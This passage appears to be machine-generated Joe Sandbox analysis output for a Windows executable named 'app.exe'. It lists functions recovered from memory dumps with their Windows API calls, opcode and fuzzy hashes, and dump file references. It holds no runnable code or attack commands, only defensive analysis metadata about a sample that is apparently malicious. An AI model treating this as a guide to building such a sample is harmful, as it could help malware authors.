                                                                                                                                              • Opcode Fuzzy Hash: bb160a83ece6b52ad72d685bd7d2f3ba3769fc739be267bbfaec33bc36789f92
                                                                                                                                              • Instruction Fuzzy Hash: 7A219231A00119AADB15FBA1DD47BEEBB68AF11709F10013BF501B10E2DBB95B058AA9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041AD08 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\app.exe,00000104,76170A60,00000000,?,?,?,?,00415EFD,?,0043A478,00000060), ref: 0041AD32
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileModuleName
                                                                                                                                              • String ID: C:\Users\user\Desktop\app.exe$`&U
                                                                                                                                              • API String ID: 514040917-459890222
                                                                                                                                              • Opcode ID: 66673b88aeac30b5862c7f19f0dfac2f7032082bc53584202ad8921e1cff1ff6
                                                                                                                                              • Instruction ID: 614c3b4fec6d9241ade8c6b785d03dc512eb996b59ee3b151466fb442cd8355e
                                                                                                                                              • Opcode Fuzzy Hash: 66673b88aeac30b5862c7f19f0dfac2f7032082bc53584202ad8921e1cff1ff6
                                                                                                                                              • Instruction Fuzzy Hash: 7711E3B6A05204AFDB11CBA5AC819DB3BB8EB56361B10017BF905D3241DB74AD84CB99
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0040B4CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FormatMessageA.KERNEL32(00001100,00000000,00000000), ref: 0040B4ED
                                                                                                                                              • LocalFree.KERNEL32(?), ref: 0040B509
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FormatFreeLocalMessage
                                                                                                                                              • String ID: %s: %s
                                                                                                                                              • API String ID: 1427518018-482213395
                                                                                                                                              • Opcode ID: cb34f2c211801dad6e02dc7f0dafd164b821e9fb1e5606d2b24e1b197d6c7187
                                                                                                                                              • Instruction ID: 35399d86799f3bd421e0b29904ac2acc2a0d57492efff96d11af9728831ada6b
                                                                                                                                              • Opcode Fuzzy Hash: cb34f2c211801dad6e02dc7f0dafd164b821e9fb1e5606d2b24e1b197d6c7187
                                                                                                                                              • Instruction Fuzzy Hash: A1E04F75680208FBEB115BC0ED07FDE7B38EB09745F600070FB00A80E1D6B26A14AB6D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025E2746 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CommandLine
                                                                                                                                              • String ID: `&U
                                                                                                                                              • API String ID: 3253501508-1867068525
                                                                                                                                              • Opcode ID: 4c608e21066b1068bf4b00fd84b95a229c866aa5cf7fac5f33b6db2afda0b2ee
                                                                                                                                              • Instruction ID: 9b6fa4ce475a429c964bbaf9ce9b9551184bf7d98fd8d02fc75588487da086c5
                                                                                                                                              • Opcode Fuzzy Hash: 4c608e21066b1068bf4b00fd84b95a229c866aa5cf7fac5f33b6db2afda0b2ee
                                                                                                                                              • Instruction Fuzzy Hash: 25B048B8C84784CB87918F71A008A083AA5B2692027816D96DA2AD2605EB350069EF18
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025CA3F0 Relevance: 5.2, APIs: 4, Instructions: 152memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025CA710: CloseHandle.KERNEL32(?), ref: 025CA7A6
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 025CA5D0
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025CA5E1
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 025CA615
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025CA626
                                                                                                                                                • Part of subcall function 025CA710: FindFirstFileW.KERNEL32(?,?), ref: 025CA8CD
                                                                                                                                                • Part of subcall function 025CA710: FindClose.KERNEL32(00000000), ref: 025CA8E0
                                                                                                                                                • Part of subcall function 025CA710: HeapFree.KERNEL32(00000000,?), ref: 025CA9F0
                                                                                                                                                • Part of subcall function 025CA710: HeapFree.KERNEL32(00000000,?), ref: 025CAA01
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseFind$FileFirstHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1603849924-0
                                                                                                                                              • Opcode ID: 7fd60108e3c947f17cccde0a06f2134368e38086809399791bed0c3c0b48279c
                                                                                                                                              • Instruction ID: 712f54dca6fc1064811da65585a35cc72d91f4df87e7249ebb2d101455728b9f
                                                                                                                                              • Opcode Fuzzy Hash: 7fd60108e3c947f17cccde0a06f2134368e38086809399791bed0c3c0b48279c
                                                                                                                                              • Instruction Fuzzy Hash: 68711675904B44CFE721CF68C944B52BBF0FF18318F109A5DE99A8BA62E731B984CB44
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0258204D Relevance: 5.1, APIs: 4, Instructions: 67memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0258224A: HeapFree.KERNEL32(00000000,?), ref: 025822AD
                                                                                                                                                • Part of subcall function 0258224A: HeapFree.KERNEL32(00000000,?), ref: 025822C7
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582137
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582154
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582187
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258219E
                                                                                                                                                • Part of subcall function 02582374: HeapFree.KERNEL32(00000000,?,?,?,0258C1F4), ref: 02582393
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1910495013-0
                                                                                                                                              • Opcode ID: fafc8545d1e0ee592f43380223a977fae7ae16cc07f112644848093fc61ddf42
                                                                                                                                              • Instruction ID: 5cbc37786f8a37ec56f265d1c9d63e297cae17ed2af14f5f98659738aa527a5d
                                                                                                                                              • Opcode Fuzzy Hash: fafc8545d1e0ee592f43380223a977fae7ae16cc07f112644848093fc61ddf42
                                                                                                                                              • Instruction Fuzzy Hash: 04311C30545B81DEEB7AEB34D818BE7BFE17B12308F04081CD5EB955A0CBB42589CB0A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025856BF Relevance: 5.1, APIs: 4, Instructions: 67memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025857F5
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 025858DF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02585969
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860B5
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860D2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 02586105
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258632F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1910495013-0
                                                                                                                                              • Opcode ID: 5693f169862e010611fd35ac66bcdcc814052ad508fc8a7f05ccf7671d51d12d
                                                                                                                                              • Instruction ID: 39a31294717058e13e0efd6edbbdf08f3aa36bbba553cba248ddbd69a504ffde
                                                                                                                                              • Opcode Fuzzy Hash: 5693f169862e010611fd35ac66bcdcc814052ad508fc8a7f05ccf7671d51d12d
                                                                                                                                              • Instruction Fuzzy Hash: 2F21E531544201DFDF25EF10D8887E97BA6BF80315F044479DD489F296CBB15895CF9A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 02582062 Relevance: 5.1, APIs: 4, Instructions: 65memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582137
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582154
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582187
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258219E
                                                                                                                                                • Part of subcall function 02582374: HeapFree.KERNEL32(00000000,?,?,?,0258C1F4), ref: 02582393
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1910495013-0
                                                                                                                                              • Opcode ID: 67268eaf495987e7ba767f0d0d0c0cbf8d97906f45aabd789f454e4b0b6f89e0
                                                                                                                                              • Instruction ID: fa192ef5c2b6e3388e7718a01416c6f6ddf5ac4b5795bf58c28442a66f451eba
                                                                                                                                              • Opcode Fuzzy Hash: 67268eaf495987e7ba767f0d0d0c0cbf8d97906f45aabd789f454e4b0b6f89e0
                                                                                                                                              • Instruction Fuzzy Hash: 62310C30145B80DEEB7AEB34D818BE7BFE17B52309F04081DD5EB955A1CBB42589DB0A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0258203F Relevance: 5.1, APIs: 4, Instructions: 65memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0257C781: HeapFree.KERNEL32(00000000,?), ref: 0257D2DD
                                                                                                                                                • Part of subcall function 0257C781: HeapFree.KERNEL32(00000000,?), ref: 0257D32E
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582137
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582154
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582187
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258219E
                                                                                                                                                • Part of subcall function 02582374: HeapFree.KERNEL32(00000000,?,?,?,0258C1F4), ref: 02582393
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1910495013-0
                                                                                                                                              • Opcode ID: 9afb99f09c3f509f416d90dd15c3e6c2419dcd20711dc49ee022c4f6f9e5f32e
                                                                                                                                              • Instruction ID: 9186f917e0a980fb2710ee90d8c40cdbd956869edebc4a1216b1b03fd2c90749
                                                                                                                                              • Opcode Fuzzy Hash: 9afb99f09c3f509f416d90dd15c3e6c2419dcd20711dc49ee022c4f6f9e5f32e
                                                                                                                                              • Instruction Fuzzy Hash: AF310E30145B80DEEB79EB34D818BE7BFE17B52309F04081DD5EB955A1CBB42589DB0A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0258206F Relevance: 5.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 02582324: HeapFree.KERNEL32(00000000,?), ref: 0258234F
                                                                                                                                                • Part of subcall function 02582324: HeapFree.KERNEL32(00000000,?), ref: 0258236C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582137
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582154
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582187
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258219E
                                                                                                                                                • Part of subcall function 02582374: HeapFree.KERNEL32(00000000,?,?,?,0258C1F4), ref: 02582393
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1910495013-0
                                                                                                                                              • Opcode ID: 438876fa6ef73cd743ee840f140a2b0e1e1e994d70930dabff6ca560a267e90b
                                                                                                                                              • Instruction ID: 55b76915917ac253f6071291f5f76a3257b0c684061ea12f845bf6376da65f98
                                                                                                                                              • Opcode Fuzzy Hash: 438876fa6ef73cd743ee840f140a2b0e1e1e994d70930dabff6ca560a267e90b
                                                                                                                                              • Instruction Fuzzy Hash: 1A310D30145B80DEEB7AEB34D818BE7BFE17B52309F04081CD5EB955A1CBB42589DB0A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025D668F Relevance: 5.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,025D0912), ref: 025D66D4
                                                                                                                                                • Part of subcall function 025D6BAA: HeapFree.KERNEL32(00000000,00000000,?,026133EC,025D7C1C,00000000,00000000,?,?,02611EE8,025D5C76), ref: 025D6BB8
                                                                                                                                                • Part of subcall function 025D6BAA: HeapFree.KERNEL32(00000000,?,?,026133EC,025D7C1C,00000000,00000000,?,?,02611EE8), ref: 025D6BD2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,025D0912), ref: 025D66F1
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,025D0912), ref: 025D670E
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,025D0912), ref: 025D675C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                              • Opcode ID: 7be8984d0ec79001886491a4c84d5c114a08d89aa9fbc90cfd84f27560782648
                                                                                                                                              • Instruction ID: bb7e988378dd78d18ce625cc6a753dffc295f55e92d069590a5ac78ea582d8ee
                                                                                                                                              • Opcode Fuzzy Hash: 7be8984d0ec79001886491a4c84d5c114a08d89aa9fbc90cfd84f27560782648
                                                                                                                                              • Instruction Fuzzy Hash: 35219331240605DBDB75AF28ED44FAABBAAFF40319F000919E15A471E0DB326857DF4C
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0258201D Relevance: 5.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0258224A: HeapFree.KERNEL32(00000000,?), ref: 025822AD
                                                                                                                                                • Part of subcall function 0258224A: HeapFree.KERNEL32(00000000,?), ref: 025822C7
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582137
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582154
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582187
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258219E
                                                                                                                                                • Part of subcall function 02582374: HeapFree.KERNEL32(00000000,?,?,?,0258C1F4), ref: 02582393
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1910495013-0
                                                                                                                                              • Opcode ID: b1324bc8af9e10365e0d5e1cf918145dd11e1c34f44c554d598f85362b70cbec
                                                                                                                                              • Instruction ID: 376c70b6105e3925f126d1a0cef656492d283a4c91e601d8c33d02eb12761b6f
                                                                                                                                              • Opcode Fuzzy Hash: b1324bc8af9e10365e0d5e1cf918145dd11e1c34f44c554d598f85362b70cbec
                                                                                                                                              • Instruction Fuzzy Hash: 5A312D30545B80DEEB79EB34D818BE7BFE17B12309F04081CD5EB961A0CBB42589DB0A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042B9F1 Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0042BA4E
                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?), ref: 0042BA5E
                                                                                                                                              • LocalFree.KERNEL32(?), ref: 0042BA67
                                                                                                                                              • TlsSetValue.KERNEL32(?,00000000), ref: 0042BA79
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2949335588-0
                                                                                                                                              • Opcode ID: adc86d93950956f94ff1fa4b69a28a4dbd768d562191854466258b1d3a764b62
                                                                                                                                              • Instruction ID: c8599666faf44035fd4f326778121f3d69334d8a3193f5103dac8be459df7837
                                                                                                                                              • Opcode Fuzzy Hash: adc86d93950956f94ff1fa4b69a28a4dbd768d562191854466258b1d3a764b62
                                                                                                                                              • Instruction Fuzzy Hash: 3D116731700214EFD720CF54E884F6AB3B4FF05315F90802EE142876A1CB79AD51CBA8
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0258200F Relevance: 5.1, APIs: 4, Instructions: 60memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0257C781: HeapFree.KERNEL32(00000000,?), ref: 0257D2DD
                                                                                                                                                • Part of subcall function 0257C781: HeapFree.KERNEL32(00000000,?), ref: 0257D32E
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582137
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582154
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582187
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258219E
                                                                                                                                                • Part of subcall function 02582374: HeapFree.KERNEL32(00000000,?,?,?,0258C1F4), ref: 02582393
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1910495013-0
                                                                                                                                              • Opcode ID: acf7a76a67c92246053c7fa34209de7b344dd169bd0444def9d1b54931f4976f
                                                                                                                                              • Instruction ID: 2ba688e2f69652766064f3878a76fed544d766c2b1a62b7b33142b2cde6ba85e
                                                                                                                                              • Opcode Fuzzy Hash: acf7a76a67c92246053c7fa34209de7b344dd169bd0444def9d1b54931f4976f
                                                                                                                                              • Instruction Fuzzy Hash: 4B311E30145B80DEEB79EB34D818BE7BFE17B52309F04081CD5EB951A0CBB42599DB0A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 02582032 Relevance: 5.1, APIs: 4, Instructions: 60memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582137
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582154
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582187
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258219E
                                                                                                                                                • Part of subcall function 02582374: HeapFree.KERNEL32(00000000,?,?,?,0258C1F4), ref: 02582393
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1910495013-0
                                                                                                                                              • Opcode ID: f904fb0a250f07bda3722f0cf0527b4e3d349375ce6e19615375a31447abc095
                                                                                                                                              • Instruction ID: 1dad0b2db8c0d6afd89c16604c39f2da8d9ba361d84d255df1a81c3abd56723a
                                                                                                                                              • Opcode Fuzzy Hash: f904fb0a250f07bda3722f0cf0527b4e3d349375ce6e19615375a31447abc095
                                                                                                                                              • Instruction Fuzzy Hash: D0311C30145B80DEEB7AEB34D818BE7BFE17B52309F04081CD5EB951A1CBB42599DB0A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00418C51 Relevance: 5.1, APIs: 4, Instructions: 57memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapReAlloc.KERNEL32(00000000,00000050,76170A60,00419242,76170A60,?,77D5FBD0), ref: 00418C78
                                                                                                                                              • HeapAlloc.KERNEL32(00000008,000041C4,00000000,76170A60,00419242,76170A60,?,77D5FBD0), ref: 00418CB1
                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00418CCF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 00418CE6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocHeap$FreeVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3499195154-0
